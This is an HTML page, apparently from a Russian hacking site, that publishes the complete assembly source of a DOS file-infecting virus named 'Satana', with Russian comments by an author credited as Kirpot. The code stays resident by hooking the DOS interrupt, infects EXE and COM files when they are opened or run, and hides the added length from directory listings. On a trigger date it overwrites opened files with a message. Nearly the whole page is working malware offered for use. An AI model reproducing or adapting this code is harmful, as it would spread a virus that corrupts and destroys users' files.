<html><head><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=FrontPage.Editor.Document><title>bablo</title></head><body><p><b><font size=5>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&#1042;&#1080;&#1088;&#1091;&#1089; Satana</font></b><p style="MARGIN: 0px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 150%">&nbsp;<font face="Verdana" size="2"><br>
<br>
&#1087;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1085;&#1072;
&#1085;&#1072;&#1083;&#1080;&#1095;&#1080;&#1077; &#1074;
&#1087;&#1072;&#1084;&#1103;&#1090;&#1080; - 0edf1h.<br>
&#1058;&#1086;&#1095;&#1082;&#1072; &#1074;&#1093;&#1086;&#1076;&#1072;
&#1080;&#1079; EXE &#1080; COM.<br>
<br>
<br>
lab label byte<br>
entvir proc near<br>
call adres<br>
adres: pop si<br>
sub si,3<br>
;&#1057;&#1080;&#1089;&#1090;&#1077;&#1084;&#1072;
&#1087;&#1088;&#1086;&#1085;&#1080;&#1082;&#1085;&#1086;&#1074;&#1077;&#1085;&#1080;&#1103;
&#1074; &#1087;&#1072;&#1084;&#1103;&#1090;&#1100;.<br>
push ax<br>
push bx<br>
push cx<br>
push dx<br>
push di<br>
push ds<br>
push es<br>
push si<br>
mov ax,0edf1h ;&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072;
&#1085;&#1072; &#1085;&#1072;&#1083;&#1080;&#1095;&#1080;&#1077; &#1074;
&#1087;&#1072;&#1084;&#1103;&#1090;&#1080;.<br>
int 21h<br>
cmp ax,0ffffh<br>
je inmem<br>
mov ax,es<br>
dec ax<br>
mov es,ax<br>
mov bx,3<br>
sub word ptr es:[bx],leng16<br>
dec bx<br>
mov ax,[bx]<br>
sub ax,leng16<br>
mov [bx],ax<br>
mov es,ax<br>
xor di,di<br>
cld<br>
mov cx,leng<br>
push cs<br>
pop ds<br>
rep movsb<br>
push es<br>
pop ds<br>
mov ax,3521h<br>
int 21h<br>
mov old21,bx<br>
mov old21+2,es<br>
mov ah,25h<br>
lea dx,virus<br>
int 21h<br>
inmem: pop si<br>
pop es<br>
pop ds<br>
pop di<br>
pop dx<br>
pop cx<br>
pop bx<br>
pop ax<br>
;C&#1080;&#1089;&#1090;&#1077;&#1084;&#1072;
&#1074;&#1086;&#1079;&#1074;&#1088;&#1072;&#1090;&#1072;
&#1091;&#1087;&#1088;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1103; &#1074;
&#1092;&#1072;&#1081;&#1083;.<br>
add si,offset oldbyts<br>
cmp cs:word ptr[si],'ZM'<br>
je exeinp<br>
mov di,100h<br>
push di<br>
cld<br>
movsw<br>
movsb<br>
ret<br>
exeinp: push ax<br>
mov ax,ds<br>
add ax,10h<br>
add cs:[si+22],ax<br>
pop ax<br>
jmp cs:dword ptr[si+20]<br>
entvir endp<br>
;&#1054;&#1089;&#1085;&#1086;&#1074;&#1085;&#1086;&#1081;
&#1087;&#1088;&#1086;&#1094;&#1077;&#1089;&#1089;&#1086;&#1088;
&#1074;&#1080;&#1088;&#1091;&#1089;&#1072;.<br>
;&#1059;&#1087;&#1088;&#1072;&#1074;&#1083;&#1103;&#1077;&#1090;
&#1088;&#1072;&#1079;&#1084;&#1085;&#1086;&#1078;&#1077;&#1085;&#1080;&#1077;&#1084;
&#1080; &#1075;&#1072;&#1076;&#1086;&#1089;&#1090;&#1103;&#1084;&#1080;.<br>
virus proc near<br>
pushf<br>
cmp ax,0edf1h ;C&#1080;&#1089;&#1090;&#1077;&#1084;&#1085;&#1072;&#1103;
&#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1103;
&#1074;&#1080;&#1088;&#1091;&#1089;&#1072;.<br>
je tstvir<br>
cmp ax,4b00h ;&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072;
&#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1072; &#1085;&#1072;
&#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077;.<br>
je lodfil<br>
cmp ah,3dh ;&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072;
&#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1072; &#1085;&#1072;
&#1086;&#1090;&#1082;&#1088;&#1099;&#1090;&#1080;&#1077;
&#1092;&#1072;&#1081;&#1083;&#1072;.<br>
je opnfil<br>
cmp ah,4fh ;&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072;
&#1085;&#1072; &#1087;&#1086;&#1083;&#1091;&#1095;&#1077;&#1085;&#1080;&#1077;
&#1082;&#1072;&#1090;&#1072;&#1083;&#1086;&#1075;&#1072;.<br>
je cat<br>
cmp ah,4eh ;&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072;
&#1085;&#1072; &#1087;&#1086;&#1083;&#1091;&#1095;&#1077;&#1085;&#1080;&#1077;
&#1087;&#1077;&#1088;&#1074;&#1086;&#1075;&#1086;
&#1092;&#1072;&#1081;&#1083;&#1072;.<br>
je cat<br>
goint: popf<br>
jmp cs:dword ptr old21<br>
;&#1054;&#1090;&#1074;&#1077;&#1090; &#1085;&#1072;
&#1079;&#1072;&#1087;&#1088;&#1086;&#1089; &#1086;
&#1085;&#1072;&#1083;&#1080;&#1095;&#1080;&#1080; &#1074;
&#1087;&#1072;&#1084;&#1103;&#1090;&#1080;.<br>
tstvir: mov ax,0ffffh<br>
popf<br>
iret<br>
;&#1054;&#1073;&#1088;&#1072;&#1073;&#1086;&#1090;&#1082;&#1072;
&#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1086;&#1074; &#1085;&#1072;
&#1086;&#1090;&#1082;&#1088;&#1099;&#1090;&#1080;&#1077; &#1080;
&#1079;&#1072;&#1087;&#1091;&#1089;&#1082;.<br>
opnfil:<br>
lodfil: call tstfil<br>
jne exld<br>
call inffil<br>
;&#1053;&#1077; &#1087;&#1086;&#1088;&#1072; &#1083;&#1080;
&#1057;&#1072;&#1090;&#1072;&#1085;&#1077; &#1085;&#1072; &#1073;&#1072;&#1083;?<br>
push ax<br>
push bx<br>
push cx<br>
push ds<br>
push dx<br>
mov ah,4<br>
int 1ah<br>
jc exld1<br>
cmp dx,1111h<br>
jne exld1<br>
;&#1055;&#1054;&#1056;&#1040;!!!<br>
pop dx<br>
push dx<br>
mov ax,3d02h<br>
call ld21<br>
jc exld1<br>
mov bx,ax<br>
push cs<br>
pop ds<br>
lea dx,satana<br>
mov ah,40h<br>
mov cx,24<br>
call ld21<br>
mov ah,3eh<br>
call ld21<br>
exld1: pop dx<br>
pop ds<br>
pop cx<br>
pop bx<br>
pop ax<br>
exld: jmp goint<br>
;&#1050;&#1086;&#1088;&#1088;&#1077;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1082;&#1072;
&#1076;&#1083;&#1080;&#1085;&#1099; &#1087;&#1088;&#1080;
&#1087;&#1086;&#1083;&#1091;&#1095;&#1077;&#1085;&#1080;&#1080;
&#1082;&#1072;&#1090;&#1072;&#1083;&#1086;&#1075;&#1072; &#1080;&#1083;&#1080;
&#1089;&#1090;&#1080;&#1088;&#1072;&#1085;&#1080;&#1077;
&#1082;&#1072;&#1090;&#1072;&#1083;&#1086;&#1075;&#1072;.<br>
cat: popf<br>
call ld21<br>
jc excat<br>
pushf<br>
push ax<br>
push bx<br>
push cx<br>
push dx<br>
push ds<br>
push es<br>
mov ah,2fh<br>
call ld21<br>
push es<br>
pop ds<br>
mov al,[bx+16h]<br>
and al,00011111b<br>
cmp al,31<br>
jne excor<br>
sub word ptr[bx+1ah],leng<br>
sbb word ptr[bx+1ch],0<br>
excor: pop es<br>
pop ds<br>
pop dx<br>
pop cx<br>
pop bx<br>
pop ax<br>
popf<br>
excat: sti<br>
retf 2<br>
virus endp<br>
;&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1103;&#1077;&#1090;
&#1080;&#1084;&#1103; &#1092;&#1072;&#1081;&#1083;&#1072; &#1085;&#1072; EXE
&#1080;&#1083;&#1080; COM.<br>
;&#1042; &#1089;&#1083;&#1091;&#1095;&#1072;&#1077;
&#1089;&#1086;&#1086;&#1090;&#1074;&#1077;&#1090;&#1089;&#1090;&#1074;&#1080;&#1103;
&#1091;&#1089;&#1090;&#1072;&#1085;&#1072;&#1074;&#1083;&#1080;&#1074;&#1072;&#1077;&#1090;
&#1092;&#1083;&#1072;&#1075;&#1080; &#1076;&#1083;&#1103; JE.<br>
tstfil proc near<br>
push si<br>
call convstr<br>
cmp word ptr[si],'OC'<br>
je cntcom<br>
cmp word ptr[si],'XE'<br>
jne extst<br>
cmp byte ptr[si+2],'E'<br>
extst: pop si<br>
ret<br>
cntcom: cmp byte ptr[si+2],'M'<br>
jmp extst<br>
tstfil endp<br>
;&#1055;&#1088;&#1077;&#1086;&#1073;&#1088;&#1072;&#1079;&#1091;&#1077;&#1090;
&#1089;&#1090;&#1088;&#1086;&#1082;&#1091;
&#1087;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;&#1086;&#1074; &#1074;
&#1079;&#1072;&#1075;&#1083;&#1072;&#1074;&#1085;&#1099;&#1077;
&#1073;&#1091;&#1082;&#1074;&#1099; &#1080;
&#1074;&#1086;&#1079;&#1074;&#1088;&#1072;&#1097;&#1072;&#1077;&#1090;<br>
;&#1074; SI &#1089;&#1084;&#1077;&#1097;&#1077;&#1085;&#1080;&#1077;
&#1088;&#1072;&#1089;&#1096;&#1080;&#1088;&#1077;&#1085;&#1080;&#1103;
&#1092;&#1072;&#1081;&#1083;&#1072;.<br>
convstr proc near<br>
push ax<br>
mov si,dx<br>
cld<br>
cnt: lodsb<br>
cmp al,0<br>
je exit1<br>
cmp al,'a'<br>
jae cntlt<br>
jmp cnt<br>
cntlt: cmp al,'z'<br>
ja cnt<br>
sub al,32<br>
mov [si-1],al<br>
jmp cnt<br>
exit1: sub si,4<br>
pop ax<br>
ret<br>
convstr endp<br>
;&#1047;&#1072;&#1088;&#1072;&#1078;&#1072;&#1077;&#1090;
&#1092;&#1072;&#1081;&#1083; &#1089; &#1080;&#1084;&#1077;&#1085;&#1077;&#1084;
&#1087;&#1086; &#1072;&#1076;&#1088;&#1077;&#1089;&#1091; DS:[DX].<br>
inffil proc near<br>
push ax<br>
push bx<br>
push cx<br>
push dx<br>
push si<br>
push ds<br>
push es<br>
push ds<br>
push dx<br>
mov ax,3524h<br>
push cs<br>
pop ds<br>
call ld21<br>
mov old24es,es<br>
mov old24bx,bx<br>
lea dx,area24<br>
mov ah,25h<br>
call ld21<br>
pop dx<br>
pop ds<br>
mov ax,4301h<br>
xor cx,cx<br>
call ld21<br>
jc cnti1<br>
mov ax,3d02h<br>
call ld21<br>
jnc cninf<br>
cnti1: jmp exinf<br>
cninf: mov bx,ax<br>
push cs<br>
pop ds<br>
mov ax,5700h<br>
call ld21<br>
mov date1,cx<br>
mov date2,dx<br>
mov al,cl<br>
and al,00011111b<br>
cmp al,31<br>
je exinf1<br>
cntinf: mov ah,3fh<br>
mov cx,24<br>
lea dx,oldbyts<br>
call ld21<br>
jc exinf1<br>
xor cx,cx<br>
xor dx,dx<br>
mov ax,4202h<br>
call ld21<br>
cmp ax,500<br>
jbe exinf1<br>
push ax<br>
push dx<br>
mov ah,40h<br>
xor dx,dx<br>
mov cx,leng<br>
call ld21<br>
cmp ax,cx<br>
pop dx<br>
pop ax<br>
jb exinf1<br>
cmp signat,'ZM'<br>
je exeinf<br>
mov byte ptr oldbyts,0E9h<br>
sub ax,3<br>
mov word ptr oldbyts+1,ax<br>
exinf2: mov ax,4200h<br>
xor cx,cx<br>
xor dx,dx<br>
call ld21<br>
mov ah,40h<br>
mov cx,24<br>
lea dx,oldbyts<br>
call ld21<br>
or byte ptr date1,00011111b<br>
exinf1: mov ax,5701h<br>
mov cx,date1<br>
mov dx,date2<br>
call ld21<br>
mov ah,3eh<br>
call ld21<br>
exinf: mov ax,2524h<br>
mov dx,cs:old24bx<br>
push cs:old24es<br>
pop ds<br>
call ld21<br>
pop es<br>
pop ds<br>
pop si<br>
pop dx<br>
pop cx<br>
pop bx<br>
pop ax<br>
ret<br>
exeinf: mov cx,16<br>
div cx<br>
sub ax,hdrsiz<br>
mov oldcs,ax<br>
mov oldip,dx<br>
mov ax,4202h<br>
xor cx,cx<br>
xor dx,dx<br>
call ld21<br>
mov cx,512<br>
div cx<br>
inc ax<br>
mov lastpag,dx<br>
mov filsiz,ax<br>
jmp exinf2<br>
inffil endp<br>
;&#1042;&#1099;&#1079;&#1086;&#1074; Int 21h &#1084;&#1080;&#1085;&#1091;&#1103;
&#1089;&#1080;&#1089;&#1090;&#1077;&#1084;&#1091;
&#1074;&#1080;&#1088;&#1091;&#1089;&#1072;.<br>
ld21 proc near<br>
pushf<br>
call cs:dword ptr old21<br>
ret<br>
ld21 endp<br>
;&#1054;&#1073;&#1088;&#1072;&#1073;&#1086;&#1090;&#1095;&#1080;&#1082;
&#1082;&#1088;&#1080;&#1090;&#1080;&#1095;&#1077;&#1089;&#1082;&#1086;&#1081;
&#1086;&#1096;&#1080;&#1073;&#1082;&#1080;.<br>
area24 proc near<br>
mov al,3<br>
iret<br>
area24 endp<br>
oldbyts label byte<br>
signat dw ?<br>
lastpag dw ?<br>
filsiz dw 2 dup(?)<br>
hdrsiz dw ?<br>
dw 5 dup(?)<br>
oldip dw ?<br>
oldcs dw ?<br>
oldend label byte<br>
db 0dh,0ah<br>
db 'SATANA 666 (C) XSc.'<br>
satana db '&#1057;&#1072;&#1090;&#1072;&#1085;&#1072; &#1090;&#1072;&#1084;
&#1087;&#1088;&#1072;&#1074;&#1080;&#1090; &#1073;&#1072;&#1083;'<br>
labl label byte<br>
old21 dw 2 dup(?)<br>
old24bx dw ?<br>
old24es dw ?<br>
date1 dw ?<br>
date2 dw ?<br>
codesg ends<br>
<br>
<br>
<br>
<br>
<br>
&#1072;&#1074;&#1090;&#1086;&#1088;:<u><font face="Verdana" size="2" color="#0000FF">Kirpot</font><br>
</u><br>
<br>
</font>
<p>&nbsp; <table cellSpacing=0 cellPadding=2 width=100% border=0><tbody><tr><td><font face=Arial color=#000000 size=1>Copyright � &quot;&nbsp;<a href="http://xs.by.ru">HACK-INFO</a>&quot;&nbsp; &quot; <a href=mailto:info@xakep.dax.ru>info@xakep.dax.ru</a>&quot;<br>&#1055;&#1088;&#1080; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1085;&#1080;&#1080; &#1084;&#1072;&#1090;&#1077;&#1088;&#1080;&#1072;&#1083;&#1086;&#1074; &#1086;&#1073;&#1103;&#1079;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1072; &#1089;&#1089;&#1099;&#1083;&#1082;&#1072; &#1085;&#1072;&nbsp;
        <a target="_blank" href="http://xs.by.ru">http://hack-info.tk </a>.</font></td></tr></tbody></table><p style="MARGIN: 0px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%">&nbsp;</p></body></html>